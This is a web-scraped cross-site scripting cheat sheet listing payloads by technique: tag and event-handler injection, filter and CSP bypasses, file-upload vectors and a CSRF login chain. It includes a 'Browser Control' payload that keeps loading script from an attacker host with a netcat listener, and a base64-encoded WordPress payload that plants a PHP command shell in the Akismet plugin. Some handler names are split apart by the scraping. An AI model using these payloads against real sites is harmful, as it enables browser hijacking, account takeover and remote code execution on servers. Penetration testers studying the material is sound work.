Basic and advanced exploits for XSS proofs and attacks.
Work in progress, bookmark it.
Technique | Vector/Payload * | ||||||||||||||||||
* In URLs: | & => %26 , # => %23 , + => %2B | ||||||||||||||||||
HTML Context Tag Injection |
<svg onl oad=alert(1)> "><svg onl oad=alert(1)// |
HTML Context Inline Injection |
"onmouseover=alert(1)// "autofocus/onfocus=alert(1)// |
Javascript Context Code Injection |
'-alert(1)-' '-alert(1)// |
Javascript Context Code Injection (escaping the escape) |
\'-alert(1)// |
Javascript Context Tag Injection |
</script><svg onl oad=alert(1)> |
PHP_SELF Injection | http://DOMAIN/PAGE.php/"><svg onl oad=alert(1)> | ||||||||||||||||||
Without Parenthesis | <svg onl oad=alert`1`> <svg onl oad=alert(1)> <svg onl oad=alert(1)> <svg onl oad=alert(1)> |
Filter Bypass Alert Obfuscation |
(alert)(1) a=alert,a(1) [1].find(alert) top["al"+"ert"](1) top[/al/.source+/ert/.source](1) al\u0065rt(1) top['al\145rt'](1) top['al\x65rt'](1) top[8680439..toString(30)](1) |
Body Tag |
<body onl oad=alert(1)> <body onpageshow=alert(1)> <body onfocus=alert(1)> <body onhashchange=alert(1)><a href=#x>click this!#x <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x <body onscroll=alert(1)><br><br><br><br> <br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><x id=x>#x <body onresize=alert(1)>press F12! <body onhelp=alert(1)>press F1! (MSIE) |
Miscellaneous Vectors |
<marquee onstart=alert(1)> <marquee loop=1 width=0 onfinish=alert(1)> <audio src onl oadstart=alert(1)> <video onl oadstart=alert(1)><source> <input autofocus onblur=alert(1)> <keygen autofocus onfocus=alert(1)> <form onsubmit=alert(1)><input type=submit> <select onchange=alert(1)><option>1<option>2 <menu id=x contextmenu=x onshow=alert(1)>right click me! |
Agnostic Event Handlers |
<x contenteditable onblur=alert(1)>lose focus! <x onclick=alert(1)>click this! <x oncopy=alert(1)>copy this! <x oncontextmenu=alert(1)>right click this! <x oncut=alert(1)>copy this! <x ondblclick=alert(1)>double click this! <x ondrag=alert(1)>drag this! <x contenteditable onfocus=alert(1)>focus this! <x contenteditable oninput=alert(1)>input here! <x contenteditable onkeydown=alert(1)>press any key! <x contenteditable onkeypress=alert(1)>press any key! <x contenteditable onkeyup=alert(1)>press any key! <x onm ousedown=alert(1)>click this! <x onm ousemove=alert(1)>hover this! <x onm ouseout=alert(1)>hover this! <x onm ouseover=alert(1)>hover this! <x onm ouseup=alert(1)>click this! <x contenteditable onpaste=alert(1)>paste here! |
Code Reuse Inline Script |
<script>alert(1)// <script>alert(1)<!– |
Code Reuse Regular Script |
<script src=//> <script src=//3334957647/1> |
Filter Bypass Generic Tag + Handler |
Generic Source Breaking | <x onxxx=alert(1) 1=' |
Browser Control | <svg onl oad=setInterval(function(){with(document)body. appendChild(createElement('script')).src='//HOST:PORT'},0)> $ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done |
Multi Reflection |
Without Event Handlers |
<script>alert(1)</script> <script src=javascript:alert(1)> <iframe src=javascript:alert(1)> <embed src=javascript:alert(1)> <a href=javascript:alert(1)>click <math><brute href=javascript:alert(1)>click <form action=javascript:alert(1)><input type=submit> <isindex action=javascript:alert(1) type=submit value=click> <form><button formaction=javascript:alert(1)>click <form><input formaction=javascript:alert(1) type=submit value=click> <form><input formaction=javascript:alert(1) type=image value=click> <form><input formaction=javascript:alert(1) type=image src=SOURCE> <isindex formaction=javascript:alert(1) type=submit value=click> <object data=javascript:alert(1)> <iframe srcdoc=<svg/onload=alert(1)>> <svg><script xlink:href=data:,alert(1) /> <math><brute xlink:href=javascript:alert(1)>click <svg><a xmlns:xlink= xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> |
Mobile Only |
Generic Self to Regular XSS | <iframe src=LOGOUT_URL onl oad=forms[0].submit()> </iframe><form method=post action=LOGIN_URL> <input name=USERNAME_PARAMETER_NAME value=USERNAME> <input name=PASSWORD_PARAMETER_NAME value=PASSWORD> |
File Upload |
Injection in Filename "><img src=1 one rror=alert(1)>.gif Injection in Metadata $ exiftool -Artist='"><img src=1 one rror=alert(1)>' FILENAME.jpeg Injection with SVG File <svg xmlns="" onl oad="alert(document.domain)"/> Injection with GIF File as Source of Script (CSP Bypass) GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; |
Google Chrome Auditor Bypass (up to v51) |
<script src="data:,alert(1)// "><script src=data:,alert(1)// <script src="// "><script src=// <link rel=import href="data:text/html,<script>alert(1)</script> "><link rel=import href=data:text/html,<script>alert(1)</script> |
PHP File for XHR Remote Call |
<?php header(“Access-Control-Allow-Origin: *”); ?> <img src=1 one rror=alert(1)> |
Server Log Avoidance | <svg onl oad=eval(URL.slice(-8))>#alert(1) <svg onl oad=eval(location.hash.slice(1)>#alert(1) <svg onl oad=innerHTML=location.hash>#<script>alert(1)</script> |
Shortest PoC |
<base href=//0> $ while:; do echo "alert(1)" | nc -lp80; done |
Portable Wordpress RCE |
<script/src="data:,eval(atob(location.hash.slice(1)))//# #eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC 5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE 9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD Qp4LnNlbmQoJCk= http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD |